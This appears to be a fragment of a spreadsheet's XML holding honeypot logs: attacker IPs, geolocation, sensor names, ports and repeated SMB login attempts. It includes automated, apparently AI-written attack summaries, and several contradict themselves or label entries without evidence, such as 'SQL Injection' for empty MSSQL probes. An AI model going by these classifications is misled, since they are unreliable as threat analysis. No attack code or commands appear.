    <t>I'm ready when you are. Please provide the log data, and I'll analyze it accordingly. &amp;&amp; I'd be happy to help, but I need some log data to work with. Please provide the log data from the honeypot and I'll analyze it for you.
Once you provide the log data, I'll:
* Name the type of attack in a short phrase (max 2 words). &amp;&amp; Port Scan</t>
  </si>
  <si>
    <t>5ab9301f39c28026ebf0c246159da44f</t>
  </si>
  <si>
    <t>120.61.1.247</t>
  </si>
  <si>
    <t>KL</t>
  </si>
  <si>
    <t>Kerala</t>
  </si>
  <si>
    <t>Palakkad</t>
  </si>
  <si>
    <t>1260728</t>
  </si>
  <si>
    <t>10.7732</t>
  </si>
  <si>
    <t>76.6537</t>
  </si>
  <si>
    <t>::ffff:783d:1f7</t>
  </si>
  <si>
    <t>No recent TELNET activity was detected, indicating that this service has been idle or not targeted by any potential malicious actors so far. &amp;&amp; No TELNET activity detected, indicating a potential attempt to exploit or scan for vulnerabilities.</t>
  </si>
  <si>
    <t>Brute Scan &amp;&amp; Port Scanning</t>
  </si>
  <si>
    <t>8d571361b01b17bb9b762f6b34f11779</t>
  </si>
  <si>
    <t>27.109.11.66</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_SSH_H4&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;22&amp;&amp;6889&amp;&amp;15667&amp;&amp;1433</t>
  </si>
  <si>
    <t>Ahmadabad</t>
  </si>
  <si>
    <t>Ahmedabad (Vasant Vihar)</t>
  </si>
  <si>
    <t>1279233</t>
  </si>
  <si>
    <t>380001</t>
  </si>
  <si>
    <t>23.0334</t>
  </si>
  <si>
    <t>72.558</t>
  </si>
  <si>
    <t>17625</t>
  </si>
  <si>
    <t>Blazenet Pvt Ltd</t>
  </si>
  <si>
    <t>BlazeNet</t>
  </si>
  <si>
    <t>::ffff:1b6d:b42</t>
  </si>
  <si>
    <t>a5e8cc9921425cb73253dfa3f5b752d0</t>
  </si>
  <si>
    <t>117.233.197.217</t>
  </si>
  <si>
    <t>::ffff:75e9:c5d9</t>
  </si>
  <si>
    <t>e48b692c8e7f9be6892393eaf604dee7</t>
  </si>
  <si>
    <t>103.182.125.55</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_SMB_H22&amp;&amp;SMA-LAB_IPP_H28&amp;&amp;SMA-LAB_SOCKS5_H1&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_VNC_H28&amp;&amp;SMA-LAB_PJL_H18&amp;&amp;SMA-LAB_IRC_H37&amp;&amp;SMA-LAB_HTTPS_H12&amp;&amp;SMA-LAB_SSH_H35&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_IPP_H25&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_ORACLE_H42&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_SIP_H23&amp;&amp;SMA-LAB_HTTPS_H18&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H17</t>
  </si>
  <si>
    <t>47792&amp;&amp;23&amp;&amp;445&amp;&amp;631&amp;&amp;1080&amp;&amp;389&amp;&amp;5900&amp;&amp;9100&amp;&amp;6667&amp;&amp;443&amp;&amp;22&amp;&amp;46571&amp;&amp;6379&amp;&amp;631&amp;&amp;1080&amp;&amp;1521&amp;&amp;5900&amp;&amp;9100&amp;&amp;5060&amp;&amp;443&amp;&amp;3389&amp;&amp;40246&amp;&amp;NA&amp;&amp;57018&amp;&amp;18646</t>
  </si>
  <si>
    <t>12.874600000000001</t>
  </si>
  <si>
    <t>74.8486</t>
  </si>
  <si>
    <t>135774</t>
  </si>
  <si>
    <t>MANGALURU BROADBAND NETWORK PRIVATE LIMITED</t>
  </si>
  <si>
    <t>Mangaluru Broadband Network Private Limited</t>
  </si>
  <si>
    <t>2022-02-23</t>
  </si>
  <si>
    <t>MBNL</t>
  </si>
  <si>
    <t>::ffff:67b6:7d37</t>
  </si>
  <si>
    <t>No log data available for analysis. 
This means there is currently no information about possible malicious activity to examine, making it impossible to draw any conclusions or identify potential security threats. &amp;&amp; The telnet service is being accessed, possibly indicating unauthorized access or reconnaissance attempts to gather information about system services. This could be an initial step by malicious actors before attempting more severe attacks. The absence of data suggests a potential probing activity rather than a successful connection.</t>
  </si>
  <si>
    <t>1aa7153443ba9e277b57cd10df64a031</t>
  </si>
  <si>
    <t>147.185.133.60</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_IRC_H30&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_HTTPS_H29</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;80&amp;&amp;15205&amp;&amp;51320&amp;&amp;6667&amp;&amp;1433&amp;&amp;53964&amp;&amp;54578&amp;&amp;443&amp;&amp;53304&amp;&amp;55477&amp;&amp;52840&amp;&amp;55288&amp;&amp;55459&amp;&amp;110&amp;&amp;50972</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_IRC:NA}</t>
  </si>
  <si>
    <t>::ffff:93b9:853c</t>
  </si>
  <si>
    <t>This log entry suggests that there was an attempt to initiate a malicious IRC (Internet Relay Chat) communication, likely for spreading malware or conducting further attacks. The IRC protocol is often exploited by attackers for command and control purposes. &amp;&amp; Possible malicious activity involves an unknown entity attempting to use Internet Relay Chat (IRC) services, with no data received indicating further action or interaction was made. The IRC attempt may be related to spreading malware, conducting reconnaissance, or facilitating communication among malicious actors. No further information is available due to the lack of received data.</t>
  </si>
  <si>
    <t>13b27f418826a4ea42f3a8f706ad52df</t>
  </si>
  <si>
    <t>59.93.238.83</t>
  </si>
  <si>
    <t>::ffff:3b5d:ee53</t>
  </si>
  <si>
    <t>The telnet service is being accessed but its status remains unknown.
This could indicate an attempt to scan or exploit vulnerabilities in the system.
It may also suggest that the attacker is probing for open ports or services. &amp;&amp; No TELNET activity was detected, suggesting an attempt to exploit this service may have been made but it did not result in a connection. No malicious activity through TELNET protocol has been recorded. This could indicate that the service is either down or well-configured security measures prevented unauthorized access.</t>
  </si>
  <si>
    <t>7522e90dc16981b029fa938fb217f82b</t>
  </si>
  <si>
    <t>115.96.27.126</t>
  </si>
  <si>
    <t>&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_SMB_H34</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49256)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49298)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,62496)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,62956)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,62874)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59195)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59304)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59387)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59534)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59626)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59708)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59856)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59999)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,60179)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,60347)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,60472)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,60565)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,64725)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user5,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,64749)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user5,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,65331)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user5,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49270)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49306)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49331)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49357)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49392)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49427)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49445)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49472)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49501)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49527)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49553)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49586)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49630)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49662)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49698)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49723)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51133)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51168)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51200)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51231)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51261)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51289)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51323)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51358)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51520)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51548)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51559)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51592)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51622)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51652)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user7,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51677)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user7,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51701)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user7,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51731)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user7,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51754)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user7,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,52100)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user7,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,52761)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user7,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,52804)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59215)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59560)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59919)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59974)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,61931)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,62729)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,52315)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,54988)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,57172)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,60850)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,61043)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,61625)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,65406)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49231)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,50247)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51515)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51621)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,53282)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,53464)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,53737)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,54025)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,54286)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,54540)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,54644)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,54740)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,58385)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59821)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,60104)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,60446)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,60678)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,60858)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,61114)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51458)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59127)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59193)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:7360:1b7e</t>
  </si>
  <si>
    <t>There is insufficient information to analyze.</t>
  </si>
  <si>
    <t>99106077d9959d76c56bd5f9a01e95d3</t>
  </si>
  <si>
    <t>14.241.43.229</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}</t>
  </si>
  <si>
    <t>::ffff:ef1:2be5</t>
  </si>
  <si>
    <t>This suggests an attempt to access or exploit Microsoft SQL Server services. The "NA" value likely indicates that the service was not found or accessible, implying the attacker's goal was unauthorized access. The activity appears to be a reconnaissance or probing action targeting database services. &amp;&amp; The data indicates that an attempt was made to access MySQL services, likely for unauthorized purposes such as database extraction or exploitation. The user appears to be probing the system's vulnerability to MySQL-related attacks. This could be a reconnaissance step by an attacker before launching a more targeted attack.</t>
  </si>
  <si>
    <t>SQL Injection &amp;&amp; SQL Injection</t>
  </si>
  <si>
    <t>c6149aa5af296d99205dd656e159aecc</t>
  </si>
  <si>
    <t>120.57.163.79</t>
  </si>
  <si>
    <t>::ffff:7839:a34f</t>
  </si>
  <si>
    <t>2f2f009ce2484c35c8983940cba45227</t>
  </si>
  <si>
    <t>109.109.36.17</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H23&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_H20</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;9060&amp;&amp;1433&amp;&amp;63234</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['spam'&amp;&amp; 'exploits'&amp;&amp; 'unknown']}</t>
  </si>
  <si>
    <t>39308</t>
  </si>
  <si>
    <t>ANDISHE SABZ KHAZAR CO. P.J.S.</t>
  </si>
  <si>
    <t>Andishe Sabz Khazar CO. P.J.S.</t>
  </si>
  <si>
    <t>Azad university of Lahijan</t>
  </si>
  <si>
    <t>2009-11-03</t>
  </si>
  <si>
    <t>::ffff:6d6d:2411</t>
  </si>
  <si>
    <t>d2fce07f0c576b1384fd9f1556d0f546</t>
  </si>
  <si>
    <t>113.22.46.81</t>
  </si>
  <si>
    <t>Quận Hà Đông</t>
  </si>
  <si>
    <t>Hà Đông</t>
  </si>
  <si>
    <t>1581364</t>
  </si>
  <si>
    <t>20.9714</t>
  </si>
  <si>
    <t>105.779</t>
  </si>
  <si>
    <t>FPT-AS-AP</t>
  </si>
  <si>
    <t>::ffff:7116:2e51</t>
  </si>
  <si>
    <t>No activity reported for MySQL service, indicating potential probing or scanning attempts were unsuccessful. &amp;&amp; Possible malicious activity is an attempt to exploit MySQL database vulnerability, but it was unsuccessful as no additional data or information was provided indicating a successful connection or SQL query execution. This could be a probing attempt to identify vulnerable services. The lack of data suggests the attacker may have been deterred or the attack failed to progress further.</t>
  </si>
  <si>
    <t>49c731a2e846bde6f964d0fd663e2fb1</t>
  </si>
  <si>
    <t>210.89.34.165</t>
  </si>
  <si>
    <t>Rajasthan</t>
  </si>
  <si>
    <t>Jaipur</t>
  </si>
  <si>
    <t>1269515</t>
  </si>
  <si>
    <t>26.9196</t>
  </si>
  <si>
    <t>75.7878</t>
  </si>
  <si>
    <t>134674</t>
  </si>
  <si>
    <t>Tata Play Broadband Private Limited</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (210.89.34.165,57921)}</t>
  </si>
  <si>
    <t>::ffff:d259:22a5</t>
  </si>
  <si>
    <t>An unknown device from IP address 210.89.34.165 is attempting to connect to a shared resource. This may be an attempt by an attacker to access sensitive files or gain unauthorized access. The nature of the incoming connection suggests potential malicious intent.</t>
  </si>
  <si>
    <t>3ee46fa353981255ba3aa8ae7f8a40fa</t>
  </si>
  <si>
    <t>103.164.180.107</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H36</t>
  </si>
  <si>
    <t>::ffff:67a4:b46b</t>
  </si>
  <si>
    <t>Possible malicious activity involves an attempt to access Microsoft SQL Server, but the operation was rejected due to insufficient information provided for successful authentication or connection. The lack of authentication details suggests a brute force attack is being attempted. This could be a precursor to unauthorized database access.</t>
  </si>
  <si>
    <t>98854d69a06dedf3c8b53223c23cac3a</t>
  </si>
  <si>
    <t>217.219.186.4</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_PJL_H18&amp;&amp;SMA-LAB_HTTP_H37&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_SSH_H4&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H33</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;37006&amp;&amp;1433&amp;&amp;389&amp;&amp;9100&amp;&amp;80&amp;&amp;5900&amp;&amp;22&amp;&amp;31717&amp;&amp;445</t>
  </si>
  <si>
    <t>Gīlān</t>
  </si>
  <si>
    <t>Shahrestān-e Āstārā</t>
  </si>
  <si>
    <t>Āstārā</t>
  </si>
  <si>
    <t>142676</t>
  </si>
  <si>
    <t>38.3982</t>
  </si>
  <si>
    <t>48.8661</t>
  </si>
  <si>
    <t>DCI</t>
  </si>
  <si>
    <t>Islamic Azad university of Astara, ISP Service Provider</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,49263)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,49854)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,60796)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,61540)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,59876)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,60481)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,51296)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,51884)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,63440)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,64477)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,50952)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,51577)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,65178)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,55655)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,56178)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,60657)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,61188)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:d9db:ba04</t>
  </si>
  <si>
    <t>The data indicates an attempt to exploit Microsoft SQL Server, possibly for unauthorized database access or data theft. The attacker may be trying to inject malicious queries or execute code remotely. This is likely a sign of a SQL injection attack.</t>
  </si>
  <si>
    <t>4329bfb03088ca73084d91b3cf196763</t>
  </si>
  <si>
    <t>122.160.140.87</t>
  </si>
  <si>
    <t>::ffff:7aa0:8c57</t>
  </si>
  <si>
